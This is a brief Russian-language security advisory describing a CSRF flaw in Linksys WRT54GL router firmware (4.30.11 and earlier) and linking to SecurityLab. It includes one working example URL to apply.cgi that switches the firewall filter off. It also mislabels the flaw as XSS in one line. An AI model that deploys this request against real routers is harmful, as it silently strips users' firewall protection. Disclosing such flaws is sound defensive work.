CSRF атака в Linksys WRT54GL

<P>Программа: Linksys WRT54GL 4.30.11 и более ранние версии </P>
<P>Опасность: Низкая </P>
<P>Наличие эксплоита: Да </P>
<P>Описание: <BR>Уязвимость позволяет удаленному пользователю произвести XSS нападение.</P>
<P>Уязвимость существует из-за недостаточной проверки подлинности HTTP запросов перед выполнением некоторых действий. Злоумышленник может обманом заставить авторизованного на устройстве пользователя посетить злонамеренный сайт и отключить функционал межсетевого экрана. Пример:</P>
<P><A href="https://192.168.1.1/apply.cgi?submit_button=Firewall&amp;change_action=&amp;action=Apply&amp;block_wan=1&amp;block_loopback=0&amp;multicast_pass=0&amp;ident_pass=0&amp;block_cookie=0&amp;block_java=0&amp;block_proxy=0&amp;block_activex=0&amp;filter=off&amp;_block_wan=1&amp;_block_multicast=0&amp;_ident_pass=1">https://192.168.1.1/apply.cgi?submit_button=Firewall&amp;change_action=&amp;action=Apply&amp;block_wan=1&amp;block_loopback=0&amp;multicast_pass=0&amp;ident_pass=0&amp;block_cookie=0&amp;block_java=0&amp;block_proxy=0&amp;block_activex=0&amp;filter=off&amp;_block_wan=1&amp;_block_multicast=0&amp;_ident_pass=1</A></P>
<P><A class="" href="http://www.securitylab.ru/vulnerability/311762.php" target=_blank>SecurityLab</A></P>